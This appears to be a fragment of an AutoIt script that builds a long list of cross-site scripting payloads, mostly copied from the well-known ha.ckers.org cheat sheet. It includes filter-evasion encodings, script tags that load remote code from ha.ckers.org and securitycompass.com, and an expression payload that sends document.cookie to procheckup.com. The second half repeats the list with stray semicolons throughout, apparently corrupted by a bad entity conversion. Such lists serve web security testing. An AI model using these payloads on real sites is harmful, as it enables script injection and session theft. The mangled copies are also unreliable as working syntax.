"<IMG LOWSRC="javascript:alert('XSS')">" & @CRLF & _
"<IFRAME SRC=”http://hacker-site.com/xss.html”>" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">" & @CRLF & _
"<LINK REL="stylesheet" HREF="javascript:alert('XSS');">" & @CRLF & _
"<TABLE BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<TD BACKGROUND="javascript:alert('XSS')">" & @CRLF & _
"<DIV STYLE="background-image: url(javascript:alert('XSS'))">" & @CRLF & _
"<DIV STYLE="width: expression(alert('XSS'));">" & @CRLF & _
"<OBJECT TYPE="text/x-scriptlet" DATA="http://hacker.com/xss.html">" & @CRLF & _
"<EMBED SRC="http://hacker.com/xss.swf" AllowScriptAccess="always">" & @CRLF & _
"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->;/SCRIPT>">'>;SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>" & @CRLF & _
"'';!--"<XSS>=&{()}" & @CRLF & _
"<SCRIPT>alert('XSS')</SCRIPT>" & @CRLF & _
"<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>" & @CRLF & _
"<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>" & @CRLF & _
"<BASE HREF="javascript:alert('XSS');//">" & @CRLF & _
"<BGSOUND SRC="javascript:alert('XSS');">" & @CRLF & _
"<BODY BACKGROUND="javascript:alert('XSS');">" & @CRLF & _
"<BODY ONLOAD=alert('XSS')>" & @CRLF & _
"<DIV STYLE="background-image: url(javascript:alert('XSS'))">" & @CRLF & _
"<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">" & @CRLF & _
"<DIV STYLE="width: expression(alert('XSS'));">" & @CRLF & _
"<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>" & @CRLF & _
"<IFRAME SRC="javascript:alert('XSS');"></IFRAME>" & @CRLF & _
"<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC=javascript:alert('XSS')>" & @CRLF & _
"<IMG DYNSRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG LOWSRC="javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">" & @CRLF & _
"Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser" & @CRLF & _
"exp/*<XSS STYLE='no\xss:noxss("*//*");" & @CRLF & _
"<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS" & @CRLF & _
"<IMG SRC='vbscript:msgbox("XSS")'>" & @CRLF & _
"<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>" & @CRLF & _
"<IMG SRC="livescript:[code]">" & @CRLF & _
"%BCscript%BEalert(%A2XSS%A2)%BC/script%BE" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">" & @CRLF & _
"<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="mocha:[code]">" & @CRLF & _
"<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>" & @CRLF & _
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>" & @CRLF & _
"<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>" & @CRLF & _
"a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);" & @CRLF & _
"<STYLE TYPE="text/javascript">alert('XSS');</STYLE>" & @CRLF & _
"<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">" & @CRLF & _
"<XSS STYLE="xss:expression(alert('XSS'))">" & @CRLF & _
"<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>" & @CRLF & _
"<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>" & @CRLF & _
"<LINK REL="stylesheet" HREF="javascript:alert('XSS');">" & @CRLF & _
"<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">" & @CRLF & _
"<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>" & @CRLF & _
"<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">" & @CRLF & _
"<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>" & @CRLF & _
"<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>" & @CRLF & _
"<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>" & @CRLF & _
"<HTML xmlns:xss>" & @CRLF & _
"<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>" & @CRLF & _
"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>" & @CRLF & _
"<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>" & @CRLF & _
"<HTML><BODY>" & @CRLF & _
"<!--[if gte IE 4]> " & @CRLF & _
"<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">" & @CRLF & _
"<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">" & @CRLF & _
"<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>" & @CRLF & _
"<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->" & @CRLF & _
"<? echo('<SCR)';" & @CRLF & _
"<BR SIZE="&{alert('XSS')}">" & @CRLF & _
"<IMG SRC=JaVaScRiPt:alert('XSS')>" & @CRLF & _
"<IMG SRC=javascript:alert(&quot;XSS&quot;)>" & @CRLF & _
"<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>" & @CRLF & _
"<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>" & @CRLF & _
"<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>" & @CRLF & _
"<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>" & @CRLF & _
"<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">" & @CRLF & _
"<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>" & @CRLF & _
"<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-" & @CRLF & _
"\";alert('XSS');//" & @CRLF & _
"</TITLE><SCRIPT>alert("XSS");</SCRIPT>" & @CRLF & _
"<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>" & @CRLF & _
"<IMG SRC="jav	ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav&#x09;ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav&#x0A;ascript:alert('XSS');">" & @CRLF & _
"<IMG SRC="jav&#x0D;ascript:alert('XSS');">" & @CRLF & _
"<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
" & @CRLF & _
"perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out" & @CRLF & _
"perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out" & @CRLF & _
"<IMG SRC=" &#14; javascript:alert('XSS');">" & @CRLF & _
"<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>" & @CRLF & _
"<SCRIPT SRC=http://ha.ckers.org/xss.js" & @CRLF & _
"<SCRIPT SRC=//ha.ckers.org/.j>" & @CRLF & _
"<IMG SRC="javascript:alert('XSS')"" & @CRLF & _
"<IFRAME SRC=http://ha.ckers.org/scriptlet.html <" & @CRLF & _
"<<SCRIPT>alert("XSS");//<</SCRIPT>" & @CRLF & _
"<IMG """><SCRIPT>alert("XSS")</SCRIPT>">" & @CRLF & _
"<SCRIPT>a=/XSS/" & @CRLF & _
"<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>" & @CRLF & _
"<A HREF="http://66.102.7.147/">XSS</A>" & @CRLF & _
"<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>" & @CRLF & _
"<A HREF="http://1113982867/">XSS</A>" & @CRLF & _
"<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>" & @CRLF & _
"<A HREF="http://0102.0146.0007.00000223/">XSS</A>" & @CRLF & _
"<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>" & @CRLF & _
"<A HREF="//www.google.com/">XSS</A>" & @CRLF & _
"<A HREF="//google">XSS</A>" & @CRLF & _
"<A HREF="http://ha.ckers.org@google">XSS</A>" & @CRLF & _
"<A HREF="http://google:ha.ckers.org">XSS</A>" & @CRLF & _
"<A HREF="http://google.com/">XSS</A>" & @CRLF & _
"<A HREF="http://www.google.com./">XSS</A>" & @CRLF & _
"<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>" & @CRLF & _
"<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>" & @CRLF & _
"<script>document.vulnerable=true;</script>" & @CRLF & _
"<img SRC="jav ascript:document.vulnerable=true;">" & @CRLF & _
"<img SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<img SRC="  javascript:document.vulnerable=true;">" & @CRLF & _
"<body onload!#$%&()*~+-_.,:;?@[/|\]^`=document.vulnerable=true;>" & @CRLF & _
"<<SCRIPT>document.vulnerable=true;//<</SCRIPT>" & @CRLF & _
"<script <B>document.vulnerable=true;</script>" & @CRLF & _
"<img SRC="javascript:document.vulnerable=true;"" & @CRLF & _
"<iframe src="javascript:document.vulnerable=true; <" & @CRLF & _
"<script>a=/XSS/\ndocument.vulnerable=true;</script>" & @CRLF & _
"\";document.vulnerable=true;;//" & @CRLF & _
"</title><SCRIPT>document.vulnerable=true;</script>" & @CRLF & _
"<input TYPE="IMAGE" SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<body BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<body ONLOAD=document.vulnerable=true;>" & @CRLF & _
"<img DYNSRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<img LOWSRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<bgsound SRC="javascript:document.vulnerable=true;">" & @CRLF & _
"<br SIZE="&{document.vulnerable=true}">" & @CRLF & _
"<LAYER SRC="javascript:document.vulnerable=true;"></LAYER>" & @CRLF & _
"<link REL="stylesheet" HREF="javascript:document.vulnerable=true;">" & @CRLF & _
"<style>li {list-style-image: url("javascript:document.vulnerable=true;");</STYLE><UL><LI>XSS" & @CRLF & _
"<img SRC='vbscript:document.vulnerable=true;'>" & @CRLF & _
"1script3document.vulnerable=true;1/script3" & @CRLF & _
"<meta HTTP-EQUIV="refresh" CONTENT="0;url=javascript:document.vulnerable=true;">" & @CRLF & _
"<meta HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:document.vulnerable=true;">" & @CRLF & _
"<IFRAME SRC="javascript:document.vulnerable=true;"></iframe>" & @CRLF & _
"<FRAMESET><FRAME SRC="javascript:document.vulnerable=true;"></frameset>" & @CRLF & _
"<table BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<table><TD BACKGROUND="javascript:document.vulnerable=true;">" & @CRLF & _
"<div STYLE="background-image: url(javascript:document.vulnerable=true;)">" & @CRLF & _
"<div STYLE="background-image: url(javascript:document.vulnerable=true;)">" & @CRLF & _
"<div STYLE="width: expression(document.vulnerable=true);">" & @CRLF & _
"<style>@im\port'\ja\vasc\ript:document.vulnerable=true';</style>" & @CRLF & _
"<img STYLE="xss:expr/*XSS*/ession(document.vulnerable=true)">" & @CRLF & _
"<XSS STYLE="xss:expression(document.vulnerable=true)">" & @CRLF & _
"exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(document.vulnerable=true)'>" & @CRLF & _
"<style TYPE="text/javascript">document.vulnerable=true;</style>" & @CRLF & _
"<style>.XSS{background-image:url("javascript:document.vulnerable=true");}</STYLE><A CLASS=XSS></a>" & @CRLF & _
"<style type="text/css">BODY{background:url("javascript:document.vulnerable=true")}</style>" & @CRLF & _
"<!--[if gte IE 4]><SCRIPT>document.vulnerable=true;</SCRIPT><![endif]-->" & @CRLF & _
"<base HREF="javascript:document.vulnerable=true;//">" & @CRLF & _
"<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:document.vulnerable=true></object>" & @CRLF & _
"<XML ID=I><X><C><![<IMG SRC="javas]]<![cript:document.vulnerable=true;">]]</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></span>" & @CRLF & _
"<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:document.vulnerable=true"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></span>" & @CRLF & _
"<html><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>document.vulnerable=true</SCRIPT>"></BODY></html>" & @CRLF & _
"<? echo('<SCR)';echo('IPT>document.vulnerable=true</SCRIPT>'); ?>" & @CRLF & _
"<meta HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>document.vulnerable=true</SCRIPT>">" & @CRLF & _
"<head><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-document.vulnerable=true;+ADw-/SCRIPT+AD4-" & @CRLF & _
"<a href="javascript#document.vulnerable=true;">" & @CRLF & _
"<div onmouseover="document.vulnerable=true;">" & @CRLF & _
"<img src="javascript:document.vulnerable=true;">" & @CRLF & _
"<img dynsrc="javascript:document.vulnerable=true;">" & @CRLF & _
"<input type="image" dynsrc="javascript:document.vulnerable=true;">" & @CRLF & _
"<bgsound src="javascript:document.vulnerable=true;">" & @CRLF & _
"&<script>document.vulnerable=true;</script>" & @CRLF & _
"&{document.vulnerable=true;};" & @CRLF & _
"<img src=&{document.vulnerable=true;};>" & @CRLF & _
"<link rel="stylesheet" href="javascript:document.vulnerable=true;">" & @CRLF & _
"<iframe src="vbscript:document.vulnerable=true;">" & @CRLF & _
"<img src="mocha:document.vulnerable=true;">" & @CRLF & _
"<img src="livescript:document.vulnerable=true;">" & @CRLF & _
"<a href="about:<script>document.vulnerable=true;</script>">" & @CRLF & _
"<meta http-equiv="refresh" content="0;url=javascript:document.vulnerable=true;">" & @CRLF & _
"<body onload="document.vulnerable=true;">" & @CRLF & _
"<div style="background-image: url(javascript:document.vulnerable=true;);">" & @CRLF & _
"<div style="behaviour: url([link to code]);">" & @CRLF & _
"<div style="binding: url([link to code]);">" & @CRLF & _
"<div style="width: expression(document.vulnerable=true;);">" & @CRLF & _
"<style type="text/javascript">document.vulnerable=true;</style>" & @CRLF & _
"<object classid="clsid:..." codebase="javascript:document.vulnerable=true;">" & @CRLF & _
"<style><!--</style><script>document.vulnerable=true;//--></script>" & @CRLF & _
"<<script>document.vulnerable=true;</script>" & @CRLF & _
"<![<!--]]<script>document.vulnerable=true;//--></script>" & @CRLF & _
"<!-- -- --><script>document.vulnerable=true;</script><!-- -- -->" & @CRLF & _
"<img src="blah"onmouseover="document.vulnerable=true;">" & @CRLF & _
"<img src="blah>" onmouseover="document.vulnerable=true;">" & @CRLF & _
"<xml src="javascript:document.vulnerable=true;">" & @CRLF & _
"<xml id="X"><a><b><script>document.vulnerable=true;</script>;</b></a></xml>" & @CRLF & _
"<div datafld="b" dataformatas="html" datasrc="#X"></div>" & @CRLF & _
"[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>" & @CRLF & _
"<style>@import'http://www.securitycompass.com/xss.css';</style>" & @CRLF & _
"<meta HTTP-EQUIV="Link" Content="<http://www.securitycompass.com/xss.css>; REL=stylesheet">" & @CRLF & _
"<style>BODY{-moz-binding:url("http://www.securitycompass.com/xssmoz.xml#xss")}</style>" & @CRLF & _
"<OBJECT TYPE="text/x-scriptlet" DATA="http://www.securitycompass.com/scriptlet.html"></object>" & @CRLF & _
"<HTML xmlns:xss><?import namespace="xss" implementation="http://www.securitycompass.com/xss.htc"><xss:xss>XSS</xss:xss></html>" & @CRLF & _
"<script SRC="http://www.securitycompass.com/xss.jpg"></script>" & @CRLF & _
"<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://www.securitycompass.com/xss.js></SCRIPT>'"-->" & @CRLF & _
"<script a=">" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script =">" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=">" '' SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script "a='>'" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=`>` SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script a=">'>" SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<script>document.write("<SCRI");</SCRIPT>PT SRC="http://www.securitycompass.com/xss.js"></script>" & @CRLF & _
"<div style="binding: url(http://www.securitycompass.com/xss.js);"> [Mozilla]" & @CRLF & _
""><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>" & @CRLF & _
"</script><script>alert(1)</script>" & @CRLF & _
"</br style=a:expression(alert())>" & @CRLF & _
"<scrscriptipt>alert(1)</scrscriptipt>" & @CRLF & _
"<br size=\"&{alert('XSS')}\">" & @CRLF & _
"perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out" & @CRLF & _
"perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/?sid="%2bdocument.cookie)>" & @CRLF & _
"<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"<~/XSS STYLE=xss:expression(alert('XSS'))>" & @CRLF & _
""><script>alert('XSS')</script>" & @CRLF & _
"</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"XSS STYLE=xss:e/**/xpression(alert('XSS'))>" & @CRLF & _
"</XSS STYLE=xss:expression(alert('XSS'))>" & @CRLF & _
"';;alert(String.fromCharCode(88,83,83))//\';;alert(String.fromCharCode(88,83,83))//";;alert(String.fromCharCode(88,83,83))//\";;alert(String.fromCharCode(88,83,83))//-->;<;/SCRIPT>;";>;';>;<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;" & @CRLF & _
"';';;!--";<;XSS>;=&;{()}" & @CRLF & _
"<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT SRC=http://ha.ckers.org/xss.js>;<;/SCRIPT>;" & @CRLF & _
"<;SCRIPT>;alert(String.fromCharCode(88,83,83))<;/SCRIPT>;" & @CRLF & _
"<;BASE HREF=";javascript:alert(';XSS';);//";>;" & @CRLF & _
"<;BGSOUND SRC=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;BODY BACKGROUND=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;BODY ONLOAD=alert(';XSS';)>;" & @CRLF & _
"<;DIV STYLE=";background-image: url(javascript:alert(';XSS';))";>;" & @CRLF & _
"<;DIV STYLE=";background-image: url(&;#1;javascript:alert(';XSS';))";>;" & @CRLF & _
"<;DIV STYLE=";width: expression(alert(';XSS';));";>;" & @CRLF & _
"<;FRAMESET>;<;FRAME SRC=";javascript:alert(';XSS';);";>;<;/FRAMESET>;" & @CRLF & _
"<;IFRAME SRC=";javascript:alert(';XSS';);";>;<;/IFRAME>;" & @CRLF & _
"<;INPUT TYPE=";IMAGE"; SRC=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=javascript:alert(';XSS';)>;" & @CRLF & _
"<;IMG DYNSRC=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG LOWSRC=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode";>;" & @CRLF & _
"Redirect 302 /a.jpg http://victimsite.com/admin.asp&;deleteuser" & @CRLF & _
"exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);" & @CRLF & _
"<;STYLE>;li {list-style-image: url(";javascript:alert('XSS')";);}<;/STYLE>;<;UL>;<;LI>;XSS" & @CRLF & _
"<;IMG SRC=';vbscript:msgbox(";XSS";)';>;" & @CRLF & _
"<;LAYER SRC=";http://ha.ckers.org/scriptlet.html";>;<;/LAYER>;" & @CRLF & _
"<;IMG SRC=";livescript:[code]";>;" & @CRLF & _
"%BCscript%BEalert(%A2XSS%A2)%BC/script%BE" & @CRLF & _
"<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=javascript:alert(';XSS';);";>;" & @CRLF & _
"<;META HTTP-EQUIV=";refresh"; CONTENT=";0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K";>;" & @CRLF & _
"<;META HTTP-EQUIV=";refresh"; CONTENT=";0; URL=http://;URL=javascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";mocha:[code]";>;" & @CRLF & _
"<;OBJECT TYPE=";text/x-scriptlet"; DATA=";http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;" & @CRLF & _
"<;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389>;<;param name=url value=javascript:alert(';XSS';)>;<;/OBJECT>;" & @CRLF & _
"<;EMBED SRC=";http://ha.ckers.org/xss.swf"; AllowScriptAccess=";always";>;<;/EMBED>;" & @CRLF & _
"a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d);" & @CRLF & _
"<;STYLE TYPE=";text/javascript";>;alert(';XSS';);<;/STYLE>;" & @CRLF & _
"<;IMG STYLE=";xss:expr/*XSS*/ession(alert(';XSS';))";>;" & @CRLF & _
"<;XSS STYLE=";xss:expression(alert(';XSS';))";>;" & @CRLF & _
"<;STYLE>;.XSS{background-image:url(";javascript:alert(';XSS';)";);}<;/STYLE>;<;A CLASS=XSS>;<;/A>;" & @CRLF & _
"<;STYLE type=";text/css";>;BODY{background:url(";javascript:alert(';XSS';)";)}<;/STYLE>;" & @CRLF & _
"<;LINK REL=";stylesheet"; HREF=";javascript:alert(';XSS';);";>;" & @CRLF & _
"<;LINK REL=";stylesheet"; HREF=";http://ha.ckers.org/xss.css";>;" & @CRLF & _
"<;STYLE>;@import';http://ha.ckers.org/xss.css';;<;/STYLE>;" & @CRLF & _
"<;META HTTP-EQUIV=";Link"; Content=";<;http://ha.ckers.org/xss.css>;; REL=stylesheet";>;" & @CRLF & _
"<;STYLE>;BODY{-moz-binding:url(";http://ha.ckers.org/xssmoz.xml#xss";)}<;/STYLE>;" & @CRLF & _
"<;TABLE BACKGROUND=";javascript:alert(';XSS';)";>;<;/TABLE>;" & @CRLF & _
"<;TABLE>;<;TD BACKGROUND=";javascript:alert(';XSS';)";>;<;/TD>;<;/TABLE>;" & @CRLF & _
"<;HTML xmlns:xss>;" & @CRLF & _
"<;XML ID=I>;<;X>;<;C>;<;![CDATA[<;IMG SRC=";javas]]>;<;![CDATA[cript:alert(';XSS';);";>;]]>;" & @CRLF & _
"<;XML ID=";xss";>;<;I>;<;B>;<;IMG SRC=";javas<;!-- -->;cript:alert(';XSS';)";>;<;/B>;<;/I>;<;/XML>;" & @CRLF & _
"<;XML SRC=";http://ha.ckers.org/xsstest.xml"; ID=I>;<;/XML>;" & @CRLF & _
"<;HTML>;<;BODY>;" & @CRLF & _
"<;!--[if gte IE 4]>; " & @CRLF & _
"<;META HTTP-EQUIV=";Set-Cookie"; Content=";USERID=<;SCRIPT>;alert(';XSS';)<;/SCRIPT>;";>;" & @CRLF & _
"<;XSS STYLE=";behavior: url(http://ha.ckers.org/xss.htc);";>;" & @CRLF & _
"<;SCRIPT SRC=";http://ha.ckers.org/xss.jpg";>;<;/SCRIPT>;" & @CRLF & _
"<;!--#exec cmd=";/bin/echo ';<;SCRIPT SRC';";-->;<;!--#exec cmd=";/bin/echo ';=http://ha.ckers.org/xss.js>;<;/SCRIPT>;';";-->;" & @CRLF & _
"<;? echo(';<;SCR)';;" & @CRLF & _
"<;BR SIZE=";&;{alert(';XSS';)}";>;" & @CRLF & _
"<;IMG SRC=JaVaScRiPt:alert(';XSS';)>;" & @CRLF & _
"<;IMG SRC=javascript:alert(&;quot;XSS&;quot;)>;" & @CRLF & _
"<;IMG SRC=`javascript:alert(";RSnake says, ';XSS';";)`>;" & @CRLF & _
"<;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>;" & @CRLF & _
"<;IMG RC=&;#106;&;#97;&;#118;&;#97;&;#115;&;#99;&;#114;&;#105;&;#112;&;#116;&;#58;&;#97;&;#108;&;#101;&;#114;&;#116;&;#40;&;#39;&;#88;&;#83;&;#83;&;#39;&;#41;>;" & @CRLF & _
"<;IMG RC=&;#0000106&;#0000097&;#0000118&;#0000097&;#0000115&;#0000099&;#0000114&;#0000105&;#0000112&;#0000116&;#0000058&;#0000097&;#0000108&;#0000101&;#0000114&;#0000116&;#0000040&;#0000039&;#0000088&;#0000083&;#0000083&;#0000039&;#0000041>;" & @CRLF & _
"<;DIV STYLE=";background-image:\0075\0072\006C\0028';\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.10530053\0027\0029';\0029";>;" & @CRLF & _
"<;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;" & @CRLF & _
"<;HEAD>;<;META HTTP-EQUIV=";CONTENT-TYPE"; CONTENT=";text/html; charset=UTF-7";>; <;/HEAD>;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-" & @CRLF & _
"\";;alert(';XSS';);//" & @CRLF & _
"<;/TITLE>;<;SCRIPT>;alert("XSS");<;/SCRIPT>;" & @CRLF & _
"<;STYLE>;@im\port';\ja\vasc\ript:alert(";XSS";)';;<;/STYLE>;" & @CRLF & _
"<;IMG SRC=";jav	ascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";jav&;#x09;ascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";jav&;#x0A;ascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG SRC=";jav&;#x0D;ascript:alert(';XSS';);";>;" & @CRLF & _
"<;IMG
SRC
=
";
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t

';
X
S
S
';
)
";
>;
" & @CRLF & _
"perl -e ';print ";<;IM SRC=java\0script:alert(";XSS";)>";;';>; out" & @CRLF & _
"perl -e ';print ";&;<;SCR\0IPT>;alert(";XSS";)<;/SCR\0IPT>;";;'; >; out" & @CRLF & _
"<;IMG SRC="; &;#14; javascript:alert(';XSS';);";>;" & @CRLF & _
"<;SCRIPT/XSS SRC=";http://ha.ckers.org/xss.js";>;<;/SCRIPT>;" & @CRLF & _
"<;BODY onload!#$%&;()*~+-_.,:;?@[/|\]^`=alert(";XSS";)>;" & @CRLF & _
